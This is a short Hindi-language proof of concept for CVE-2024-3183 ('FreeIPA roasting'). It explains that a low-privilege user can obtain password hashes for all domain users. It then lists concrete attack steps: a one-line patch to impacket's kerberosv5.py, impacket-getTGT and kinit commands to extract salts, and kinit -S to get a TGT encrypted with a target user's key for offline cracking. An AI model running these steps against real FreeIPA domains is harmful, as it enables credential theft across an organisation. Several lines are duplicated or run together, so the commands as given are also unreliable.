
CVE-2024-3183 (FreeIPA Rosting) के लिए POC
CVE-2024-3183 (FreeIPA Rosting) के लिए POC
प्रभाव: एक निम्न-विशेषाधिकार प्राप्त उपयोगकर्ता सभी डोमेन उपयोगकर्ताओं के पासवर्ड का हैश प्राप्त कर सकता है और ऑफ़लाइन ब्रूट फोर्स (kerberoasting) कर सकता है।
impacket-getTGT पैच करें:
impacket/krb5/kerberosv5.py में decoder.decode.defaultErrorState = stGetValueDecoderByTag जोड़ें।impacket/krb5/kerberosv5.py में decoder.decode.defaultErrorState = stGetValueDecoderByTag जोड़ें।-service विकल्प और -debug विकल्प के साथ impacket-getTGT का उपयोग कर सकते हैं।
impacket-getTGT test.local/user -debug -service adminkinit user

printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt

kvno admin


1 - TGS, 2 - SALT, 3 - पासवर्ड।
kinit -S target userऔर आपको TGT मिलता है जो लक्षित उपयोगकर्ता की कुंजी से एन्क्रिप्ट किया गया होता है।